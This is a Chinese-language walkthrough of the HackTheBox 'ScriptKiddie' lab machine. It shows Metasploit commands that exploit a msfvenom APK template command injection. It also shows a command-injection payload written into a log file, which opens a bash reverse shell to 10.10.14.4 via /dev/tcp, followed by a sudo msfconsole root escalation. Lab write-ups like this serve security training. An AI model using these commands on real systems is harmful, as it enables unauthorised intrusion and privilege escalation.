Hackthebox-ScriptKiddie靶机实战

靶机实操

信息搜集

对端口信息进行扫描，开放端口有22，5000；
根据端口信息显示5000端口搭建有Werkzeug，但是并未未发现Werkzeug有什么可利用漏洞；

访问5000端口，发现是一个集成工具的页面，分别有nmap、msfvenom、searchsploit；

通过exploit_db发现msfvenom存在apk模板命令注入漏洞，下载exploit_db上的exp进行利用。

但是好像缺少什么模块，导致无法生成apk文件，

这里我们索性就直接使用msf来生成apk文件；

msfconsole
search msfvenom 
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
set lhost 10.10.14.4
set lport 5555
run

将生成的apk脚本上传，并在本地开启监听；

成功获取返回的shell；并且利用以下命令获取到更稳定的shell；

SHELL=/bin/bash script -q /dev/null

在根目录下我们找到了普通用户的flag;

权限提升

在/home目录下，我们发现还存在一个用户pwn,

pwn用户目录下还存在一个scanlosers.sh文件，查看此文件；

该脚本会一直读取/home/kid/logs/hackers的目录文件的IP地址

该脚本未对hackers文件传入的内容做过滤，并且我们使用的kid用户也有对该文件的编辑权限，我们直接写入一个命令执行，来让他把pwn用户的权限反弹给我们；

echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.14.4/6666 0>&1")' > /home/kid/logs/hackers

使用sudo -l 查看一下当前用户的权限；

发现pwn下的msfconsole具有root的权限，并且不需要密码；

进行提权操作；

sudo /opt/metasploit-framework-6.0.9/msfconsole

切换到/root目录下，成功得到root权限的flag